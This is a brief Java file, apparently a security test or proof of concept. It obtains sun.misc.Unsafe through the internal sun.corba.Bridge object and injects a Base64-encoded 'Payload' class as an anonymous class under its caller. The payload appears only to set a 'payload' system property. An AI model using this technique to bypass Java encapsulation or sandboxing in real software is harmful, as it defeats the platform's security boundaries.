import java.util.*;

public class Shell {
	public static int casesN;

	public String run() {
		sun.corba.Bridge b = sun.corba.Bridge.get();
		sun.misc.Unsafe u = (sun.misc.Unsafe) b.getObject(b, 16);
		byte[] classBytes = Base64.getDecoder().decode("yv66vgAAADEAOgEAB1BheWxvYWQHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAGPGluaXQ+AQADKClWDAAFAAYKAAQABwEACDxjbGluaXQ+AQAESlJ1bgcACgEAD2phdmEvbGFuZy9DbGFzcwcADAEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwADgAPCgANABABAAAIABIBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgcAFAoAFQAHAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7DAAXABgKABUAGQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAGwAcCgAEAB0BAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsMAB8AIAoADQAhAQAIdG9TdHJpbmcMACMAIAoAFQAkAQABCggAJgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAKAEAC2dldFJlc291cmNlAQAiKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9uZXQvVVJMOwwAKgArCgApACwBAAxqYXZhL25ldC9VUkwHAC4KAC8AJAEAB3BheWxvYWQIADEBABBqYXZhL2xhbmcvU3lzdGVtBwAzAQALc2V0UHJvcGVydHkBADgoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwANQA2CgA0ADcBAARDb2RlACEAAgAEAAAAAAACAAEABQAGAAEAOQAAABEAAQABAAAABSq3AAixAAAAAAAIAAkABgABADkAAABWAAMAAgAAAEoSC7YAEUsSE0y7ABVZtwAWK7YAGiq2AB62ACK2ABq2ACVMuwAVWbcAFiu2ABoSJ7YAGioSE7YALbYAMLYAGrYAJUwSMiu4ADhXsQAAAAAAAA==");
		u.ensureClassInitialized(u.defineAnonymousClass(sun.reflect.Reflection.getCallerClass(2), classBytes, null));
		return sun.security.action.GetPropertyAction.privilegedGetProperty("payload");
	}
}
